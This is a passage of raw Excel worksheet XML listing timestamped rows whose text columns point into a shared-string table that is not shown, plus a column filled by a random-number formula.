      </c>
      <c r="F12527">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12528" s="1">
        <v>43297.480949074074</v>
      </c>
      <c r="C12528" t="s">
        <v>10</v>
      </c>
      <c r="D12528" t="s">
        <v>86</v>
      </c>
      <c r="E12528" t="s">
        <v>11230</v>
      </c>
      <c r="F12528">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12529" s="1">
        <v>43297.472418981481</v>
      </c>
      <c r="C12529" t="s">
        <v>6</v>
      </c>
      <c r="D12529" t="s">
        <v>25</v>
      </c>
      <c r="E12529" t="s">
        <v>11231</v>
      </c>
      <c r="F12529">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12530" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12530" s="1">
        <v>43297.458483796298</v>
      </c>
      <c r="C12530" t="s">
        <v>189</v>
      </c>
      <c r="E12530" t="s">
        <v>11232</v>
      </c>
      <c r="F12530">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12531" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12531" s="1">
        <v>43297.458067129628</v>
      </c>
      <c r="C12531" t="s">
        <v>48</v>
      </c>
      <c r="E12531" s="2" t="s">
        <v>11233</v>
      </c>
      <c r="F12531">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12532" s="1">
        <v>43297.444490740738</v>
      </c>
      <c r="C12532" t="s">
        <v>10</v>
      </c>
      <c r="E12532" t="s">
        <v>11234</v>
      </c>
      <c r="F12532">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12533" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12533" s="1">
        <v>43297.438576388886</v>
      </c>
      <c r="C12533" t="s">
        <v>71</v>
      </c>
      <c r="E12533" s="2" t="s">
        <v>11235</v>
      </c>
      <c r="F12533">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12534" s="1">
        <v>43297.419247685182</v>
      </c>
      <c r="C12534" t="s">
        <v>10</v>
      </c>
      <c r="D12534" t="s">
        <v>163</v>
      </c>
      <c r="E12534" t="s">
        <v>11236</v>
      </c>
      <c r="F12534">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12535" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12535" s="1">
        <v>43297.390590277777</v>
      </c>
      <c r="C12535" t="s">
        <v>65</v>
      </c>
      <c r="E12535" s="2" t="s">
        <v>11237</v>
      </c>
      <c r="F12535">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12536" s="1">
        <v>43297.382476851853</v>
      </c>
      <c r="C12536" t="s">
        <v>10</v>
      </c>
      <c r="D12536" t="s">
        <v>271</v>
      </c>
      <c r="E12536" t="s">
        <v>11238</v>
      </c>
      <c r="F12536">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12537" s="1">
        <v>43297.369490740741</v>
      </c>
      <c r="C12537" t="s">
        <v>10</v>
      </c>
      <c r="D12537" t="s">
        <v>17</v>
      </c>
      <c r="E12537" t="s">
        <v>11239</v>
      </c>
      <c r="F12537">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12538" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12538" s="1">
        <v>43297.343680555554</v>
      </c>
      <c r="C12538" t="s">
        <v>10</v>
      </c>
      <c r="D12538" t="s">
        <v>112</v>
      </c>
      <c r="E12538" s="2" t="s">
        <v>11240</v>
      </c>
      <c r="F12538">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12539" s="1">
        <v>43297.342615740738</v>
      </c>
      <c r="C12539" t="s">
        <v>166</v>
      </c>
      <c r="E12539" t="s">
        <v>11241</v>
      </c>
      <c r="F12539">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12540" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12540" s="1">
        <v>43297.311365740738</v>
      </c>
      <c r="C12540" t="s">
        <v>542</v>
      </c>
      <c r="E12540" s="2" t="s">
        <v>11242</v>
      </c>
      <c r="F12540">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12541" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12541" s="1">
        <v>43297.288761574076</v>
      </c>
      <c r="C12541" t="s">
        <v>43</v>
      </c>
      <c r="E12541" s="2" t="s">
        <v>11243</v>
      </c>
      <c r="F12541">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12542" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12542" s="1">
        <v>43297.285624999997</v>
      </c>
      <c r="C12542" t="s">
        <v>48</v>
      </c>
      <c r="E12542" s="2" t="s">
        <v>11244</v>
      </c>
      <c r="F12542">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12543" s="1">
        <v>43297.278298611112</v>
      </c>
      <c r="C12543" t="s">
        <v>5233</v>
      </c>
      <c r="D12543" t="s">
        <v>229</v>
      </c>
      <c r="E12543" t="s">
        <v>10507</v>
      </c>
      <c r="F12543">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12544" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12544" s="1">
        <v>43297.261006944442</v>
      </c>
      <c r="C12544" t="s">
        <v>71</v>
      </c>
      <c r="E12544" s="2" t="s">
        <v>11245</v>
      </c>
      <c r="F12544">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12545" s="1">
        <v>43297.238368055558</v>
      </c>
      <c r="C12545" t="s">
        <v>559</v>
      </c>
      <c r="E12545" t="s">
        <v>11246</v>
      </c>
      <c r="F12545">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12546" s="1">
        <v>43297.208993055552</v>
      </c>
      <c r="C12546" t="s">
        <v>41</v>
      </c>
      <c r="E12546" t="s">
        <v>11247</v>
      </c>
      <c r="F12546">
        <f t="shared" ref="F12546:F12609" ca="1" si="196">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="12547" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12547" s="1">
        <v>43297.195</v>
      </c>
      <c r="C12547" t="s">
        <v>71</v>
      </c>
      <c r="E12547" s="2" t="s">
        <v>11248</v>
      </c>
      <c r="F12547">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12548" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12548" s="1">
        <v>43297.148530092592</v>
      </c>
      <c r="C12548" t="s">
        <v>314</v>
      </c>
      <c r="E12548" s="2" t="s">
        <v>11249</v>
      </c>
      <c r="F12548">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12549" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12549" s="1">
        <v>43297.136354166665</v>
      </c>
      <c r="C12549" t="s">
        <v>41</v>
      </c>
      <c r="E12549" s="2" t="s">
        <v>11250</v>
      </c>
      <c r="F12549">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12550" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12550" s="1">
        <v>43297.07503472222</v>
      </c>
      <c r="C12550" t="s">
        <v>71</v>
      </c>
      <c r="E12550" s="2" t="s">
        <v>11251</v>
      </c>
      <c r="F12550">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12551" s="1">
        <v>43297.034409722219</v>
      </c>
      <c r="C12551" t="s">
        <v>140</v>
      </c>
      <c r="D12551" t="s">
        <v>847</v>
      </c>
      <c r="E12551" t="s">
        <v>11252</v>
      </c>
      <c r="F12551">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12552" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12552" s="1">
        <v>43297.013078703705</v>
      </c>
      <c r="C12552" t="s">
        <v>314</v>
      </c>
      <c r="E12552" s="2" t="s">
        <v>11253</v>
      </c>
      <c r="F12552">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12553" s="1">
        <v>43297.009965277779</v>
      </c>
      <c r="C12553" t="s">
        <v>339</v>
      </c>
      <c r="E12553" t="s">
        <v>11254</v>
      </c>
      <c r="F12553">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12554" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12554" s="1">
        <v>43296.842858796299</v>
      </c>
      <c r="C12554" t="s">
        <v>2192</v>
      </c>
      <c r="D12554" t="s">
        <v>7</v>
      </c>
      <c r="E12554" s="2" t="s">
        <v>11255</v>
      </c>
      <c r="F12554">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12555" s="1">
        <v>43296.734652777777</v>
      </c>
      <c r="C12555" t="s">
        <v>10</v>
      </c>
      <c r="D12555" t="s">
        <v>6</v>
      </c>
      <c r="E12555" t="s">
        <v>11256</v>
      </c>
      <c r="F12555">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12556" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12556" s="1">
        <v>43296.685231481482</v>
      </c>
      <c r="C12556" t="s">
        <v>280</v>
      </c>
      <c r="D12556" t="s">
        <v>290</v>
      </c>
      <c r="E12556" t="s">
        <v>10507</v>
      </c>
      <c r="F12556">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12557" s="1">
        <v>43296.678715277776</v>
      </c>
      <c r="C12557" t="s">
        <v>10</v>
      </c>
      <c r="D12557" t="s">
        <v>80</v>
      </c>
      <c r="E12557" t="s">
        <v>11257</v>
      </c>
      <c r="F12557">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12558" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12558" s="1">
        <v>43296.60560185185</v>
      </c>
      <c r="C12558" t="s">
        <v>4276</v>
      </c>
      <c r="D12558" t="s">
        <v>1036</v>
      </c>
      <c r="E12558" s="2" t="s">
        <v>10750</v>
      </c>
      <c r="F12558">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12559" s="1">
        <v>43296.491701388892</v>
      </c>
      <c r="C12559" t="s">
        <v>10</v>
      </c>
      <c r="D12559" t="s">
        <v>263</v>
      </c>
      <c r="E12559" t="s">
        <v>11258</v>
      </c>
      <c r="F12559">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12560" s="1">
        <v>43296.298726851855</v>
      </c>
      <c r="C12560" t="s">
        <v>197</v>
      </c>
      <c r="E12560" t="s">
        <v>11259</v>
      </c>
      <c r="F12560">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12561" s="1">
        <v>43296.145995370367</v>
      </c>
      <c r="C12561" t="s">
        <v>63</v>
      </c>
      <c r="E12561" t="s">
        <v>11260</v>
      </c>
      <c r="F12561">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12562" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A12562" s="1">
        <v>43295.790324074071</v>
      </c>
      <c r="C12562" t="s">
        <v>65</v>
      </c>
      <c r="D12562" t="s">
        <v>11</v>
      </c>
      <c r="E12562" s="2" t="s">
        <v>11261</v>
      </c>
      <c r="F12562">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12563" s="1">
        <v>43295.692002314812</v>
      </c>
      <c r="C12563" t="s">
        <v>5233</v>
      </c>
      <c r="D12563" t="s">
        <v>80</v>
      </c>
      <c r="E12563" t="s">
        <v>8504</v>
      </c>
      <c r="F12563">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12564" s="1">
        <v>43295.604953703703</v>
      </c>
      <c r="C12564" t="s">
        <v>48</v>
      </c>
      <c r="E12564" t="s">
        <v>11262</v>
      </c>
      <c r="F12564">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12565" s="1">
        <v>43295.575659722221</v>
      </c>
      <c r="C12565" t="s">
        <v>10</v>
      </c>
      <c r="D12565" t="s">
        <v>89</v>
      </c>
      <c r="F12565">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12566" s="1">
        <v>43295.567164351851</v>
      </c>
      <c r="C12566" t="s">
        <v>10</v>
      </c>
      <c r="D12566" t="s">
        <v>89</v>
      </c>
      <c r="E12566" t="s">
        <v>11263</v>
      </c>
      <c r="F12566">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12567" s="1">
        <v>43295.566736111112</v>
      </c>
      <c r="C12567" t="s">
        <v>10</v>
      </c>
      <c r="D12567" t="s">
        <v>89</v>
      </c>
      <c r="E12567" t="s">
        <v>11264</v>
      </c>
      <c r="F12567">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12568" s="1">
        <v>43295.473958333336</v>
      </c>
      <c r="C12568" t="s">
        <v>197</v>
      </c>
      <c r="E12568" t="s">
        <v>11265</v>
      </c>
      <c r="F12568">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12569" s="1">
        <v>43295.349050925928</v>
      </c>
      <c r="C12569" t="s">
        <v>41</v>
      </c>
      <c r="E12569" t="s">
        <v>11266</v>
      </c>
      <c r="F12569">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12570" s="1">
        <v>43295.290277777778</v>
      </c>
      <c r="C12570" t="s">
        <v>454</v>
      </c>
      <c r="D12570" t="s">
        <v>336</v>
      </c>
      <c r="E12570" t="s">
        <v>11267</v>
      </c>
      <c r="F12570">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12571" s="1">
        <v>43295.239062499997</v>
      </c>
      <c r="C12571" t="s">
        <v>48</v>
      </c>
      <c r="E12571" t="s">
        <v>11268</v>
      </c>
      <c r="F12571">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12572" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12572" s="1">
        <v>43295.237835648149</v>
      </c>
      <c r="C12572" t="s">
        <v>197</v>
      </c>
      <c r="E12572" s="2" t="s">
        <v>11269</v>
      </c>
      <c r="F12572">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12573" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A12573" s="1">
        <v>43295.076481481483</v>
      </c>
      <c r="C12573" t="s">
        <v>178</v>
      </c>
      <c r="D12573" t="s">
        <v>46</v>
      </c>
      <c r="E12573" s="2" t="s">
        <v>11270</v>
      </c>
      <c r="F12573">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12574" s="1">
        <v>43294.811180555553</v>
      </c>
      <c r="C12574" t="s">
        <v>10</v>
      </c>
      <c r="D12574" t="s">
        <v>374</v>
      </c>
      <c r="E12574" t="s">
        <v>11271</v>
      </c>
      <c r="F12574">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12575" s="1">
        <v>43294.737835648149</v>
      </c>
      <c r="C12575" t="s">
        <v>6</v>
      </c>
      <c r="D12575" t="s">
        <v>114</v>
      </c>
      <c r="E12575" t="s">
        <v>11272</v>
      </c>
      <c r="F12575">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12576" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12576" s="1">
        <v>43294.709768518522</v>
      </c>
      <c r="C12576" t="s">
        <v>10</v>
      </c>
      <c r="D12576" t="s">
        <v>17</v>
      </c>
      <c r="E12576" s="2" t="s">
        <v>11273</v>
      </c>
      <c r="F12576">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12577" s="1">
        <v>43294.702546296299</v>
      </c>
      <c r="C12577" t="s">
        <v>10</v>
      </c>
      <c r="D12577" t="s">
        <v>23</v>
      </c>
      <c r="E12577" t="s">
        <v>11274</v>
      </c>
      <c r="F12577">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12578" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12578" s="1">
        <v>43294.690891203703</v>
      </c>
      <c r="C12578" t="s">
        <v>10</v>
      </c>
      <c r="D12578" t="s">
        <v>11</v>
      </c>
      <c r="E12578" s="2" t="s">
        <v>11275</v>
      </c>
      <c r="F12578">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12579" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12579" s="1">
        <v>43294.666203703702</v>
      </c>
      <c r="C12579" t="s">
        <v>10</v>
      </c>
      <c r="D12579" t="s">
        <v>6</v>
      </c>
      <c r="E12579" s="2" t="s">
        <v>11276</v>
      </c>
      <c r="F12579">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12580" s="1">
        <v>43294.615243055552</v>
      </c>
      <c r="C12580" t="s">
        <v>10</v>
      </c>
      <c r="D12580" t="s">
        <v>158</v>
      </c>
      <c r="E12580" t="s">
        <v>11277</v>
      </c>
      <c r="F12580">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12581" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A12581" s="1">
        <v>43294.586736111109</v>
      </c>
      <c r="C12581" t="s">
        <v>6</v>
      </c>
      <c r="D12581" t="s">
        <v>25</v>
      </c>
      <c r="E12581" s="2" t="s">
        <v>11278</v>
      </c>
      <c r="F12581">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12582" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12582" s="1">
        <v>43294.584907407407</v>
      </c>
      <c r="C12582" t="s">
        <v>10</v>
      </c>
      <c r="D12582" t="s">
        <v>6</v>
      </c>
      <c r="E12582" s="2" t="s">
        <v>11279</v>
      </c>
      <c r="F12582">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12583" s="1">
        <v>43294.554814814815</v>
      </c>
      <c r="C12583" t="s">
        <v>10</v>
      </c>
      <c r="D12583" t="s">
        <v>251</v>
      </c>
      <c r="E12583" t="s">
        <v>11280</v>
      </c>
      <c r="F12583">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12584" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12584" s="1">
        <v>43294.50571759259</v>
      </c>
      <c r="C12584" t="s">
        <v>48</v>
      </c>
      <c r="E12584" s="2" t="s">
        <v>11281</v>
      </c>
      <c r="F12584">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12585" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12585" s="1">
        <v>43294.491273148145</v>
      </c>
      <c r="C12585" t="s">
        <v>197</v>
      </c>
      <c r="D12585" t="s">
        <v>263</v>
      </c>
      <c r="E12585" s="2" t="s">
        <v>11282</v>
      </c>
      <c r="F12585">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12586" s="1">
        <v>43294.455879629626</v>
      </c>
      <c r="C12586" t="s">
        <v>10</v>
      </c>
      <c r="D12586" t="s">
        <v>86</v>
      </c>
      <c r="E12586" t="s">
        <v>11283</v>
      </c>
      <c r="F12586">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12587" s="1">
        <v>43294.454155092593</v>
      </c>
      <c r="C12587" t="s">
        <v>10</v>
      </c>
      <c r="D12587" t="s">
        <v>151</v>
      </c>
      <c r="E12587" t="s">
        <v>11284</v>
      </c>
      <c r="F12587">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12588" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12588" s="1">
        <v>43294.440069444441</v>
      </c>
      <c r="C12588" t="s">
        <v>10</v>
      </c>
      <c r="D12588" t="s">
        <v>36</v>
      </c>
      <c r="E12588" s="2" t="s">
        <v>11285</v>
      </c>
      <c r="F12588">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12589" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12589" s="1">
        <v>43294.424490740741</v>
      </c>
      <c r="C12589" t="s">
        <v>48</v>
      </c>
      <c r="E12589" s="2" t="s">
        <v>11286</v>
      </c>
      <c r="F12589">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12590" s="1">
        <v>43294.421435185184</v>
      </c>
      <c r="C12590" t="s">
        <v>163</v>
      </c>
      <c r="D12590" t="s">
        <v>194</v>
      </c>
      <c r="E12590" t="s">
        <v>11287</v>
      </c>
      <c r="F12590">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12591" s="1">
        <v>43294.420034722221</v>
      </c>
      <c r="C12591" t="s">
        <v>4523</v>
      </c>
      <c r="D12591" t="s">
        <v>17</v>
      </c>
      <c r="E12591" t="s">
        <v>11287</v>
      </c>
      <c r="F12591">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12592" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12592" s="1">
        <v>43294.41978009259</v>
      </c>
      <c r="C12592" t="s">
        <v>3049</v>
      </c>
      <c r="E12592" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F12592">
        <f t="shared" ca="1" si="196"/>
        <v>4</v>
      </c>
    </row>
    <row r="12593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12593" s="1">
        <v>43294.411180555559</v>
      </c>
      <c r="C12593" t="s">
        <v>6</v>
      </c>
      <c r="D12593" t="s">
        <v>602</v>
      </c>
      <c r="E12593" t="s">
        <v>11288</v>
      </c>
      <c r="F12593">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12594" s="1">
        <v>43294.407199074078</v>
      </c>
      <c r="C12594" t="s">
        <v>41</v>
      </c>
      <c r="E12594" t="s">
        <v>11289</v>
      </c>
      <c r="F12594">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12595" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12595" s="1">
        <v>43294.406921296293</v>
      </c>
      <c r="C12595" t="s">
        <v>10</v>
      </c>
      <c r="D12595" t="s">
        <v>36</v>
      </c>
      <c r="E12595" s="2" t="s">
        <v>11290</v>
      </c>
      <c r="F12595">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12596" s="1">
        <v>43294.403784722221</v>
      </c>
      <c r="C12596" t="s">
        <v>10</v>
      </c>
      <c r="D12596" t="s">
        <v>163</v>
      </c>
      <c r="E12596" t="s">
        <v>11291</v>
      </c>
      <c r="F12596">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12597" s="1">
        <v>43294.358749999999</v>
      </c>
      <c r="C12597" t="s">
        <v>41</v>
      </c>
      <c r="E12597" t="s">
        <v>11292</v>
      </c>
      <c r="F12597">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12598" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12598" s="1">
        <v>43294.316157407404</v>
      </c>
      <c r="C12598" t="s">
        <v>197</v>
      </c>
      <c r="E12598" s="2" t="s">
        <v>11293</v>
      </c>
      <c r="F12598">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12599" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12599" s="1">
        <v>43294.315717592595</v>
      </c>
      <c r="C12599" t="s">
        <v>156</v>
      </c>
      <c r="D12599" t="s">
        <v>17</v>
      </c>
      <c r="E12599" s="2" t="s">
        <v>11294</v>
      </c>
      <c r="F12599">
        <f t="shared" ca="1" si="196"/>
        <v>3</v>
      </c>
    </row>
    <row r="12600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12600" s="1">
        <v>43294.227488425924</v>
      </c>
      <c r="C12600" t="s">
        <v>333</v>
      </c>
      <c r="E12600" t="s">
        <v>11295</v>
      </c>
      <c r="F12600">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12601" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12601" s="1">
        <v>43294.226527777777</v>
      </c>
      <c r="C12601" t="s">
        <v>71</v>
      </c>
      <c r="E12601" s="2" t="s">
        <v>11296</v>
      </c>
      <c r="F12601">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12602" s="1">
        <v>43294.188263888886</v>
      </c>
      <c r="C12602" t="s">
        <v>41</v>
      </c>
      <c r="E12602" t="s">
        <v>11297</v>
      </c>
      <c r="F12602">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12603" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12603" s="1">
        <v>43294.150555555556</v>
      </c>
      <c r="C12603" t="s">
        <v>319</v>
      </c>
      <c r="D12603" t="s">
        <v>11298</v>
      </c>
      <c r="E12603" s="2" t="s">
        <v>11299</v>
      </c>
      <c r="F12603">
        <f t="shared" ca="1" si="196"/>
        <v>1</v>
      </c>
    </row>
    <row r="12604" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12604" s="1">
        <v>43294.133611111109</v>
      </c>
      <c r="C12604" t="s">
        <v>71</v>
      </c>
      <c r="E12604" s="2" t="s">
        <v>11300</v>
      </c>
      <c r="F12604">
        <f t="shared" ca="1" si="196"/>
        <v>5</v>
      </c>
    </row>
    <row r="12605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12605" s="1">
        <v>43294.119618055556</v>
      </c>
      <c r="C12605" t="s">
        <v>9609</v>
      </c>
      <c r="D12605" t="s">
        <v>713</v>
      </c>
      <c r="E12605" t="s">
        <v>11156</v>
      </c>
      <c r="F12605">
        <f t="shared" ca="1" si="196"/>
        <v>2</v>
      </c>
    </row>
    <row r="12606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12606" s="1">
        <v>43293.978217592594</v>
      </c>
      <c r="C12606" t="s">
        <v>2188</v>
